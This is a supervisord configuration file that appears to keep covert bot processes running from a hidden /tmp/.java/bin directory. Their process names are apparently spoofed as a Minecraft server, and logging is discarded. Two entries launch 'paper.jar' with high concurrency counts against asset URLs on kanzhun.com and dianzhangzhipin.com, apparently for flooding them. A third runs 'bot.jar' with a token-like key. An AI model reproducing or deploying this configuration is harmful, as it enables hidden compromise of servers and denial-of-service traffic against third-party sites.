[supervisord]
logfile=/dev/null

[program:p0]
directory=/tmp/.java/bin
command=./java -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper.jar -c 4000 -s https://static.kanzhun.com/assets/wap/js/runtime-879f2d.js 
autorestart = true
stdout_logfile=/dev/null

[program:p1]
directory=/tmp/.java/bin
command=./java -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper.jar -c 2000 -s https://img.dianzhangzhipin.com/dz/file/6Aa46EH6xN.png
autorestart = true
stdout_logfile=/dev/null

[program:gnet]
directory=/tmp/.java/bin
command=./java -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./bot.jar -s "i0k1A6E7D1-X9i7H6b-6j0K9o1-X1eCd9-F9i0J6d6A2-c4J1g5" -liq
stdout_logfile=/dev/null
autorestart = true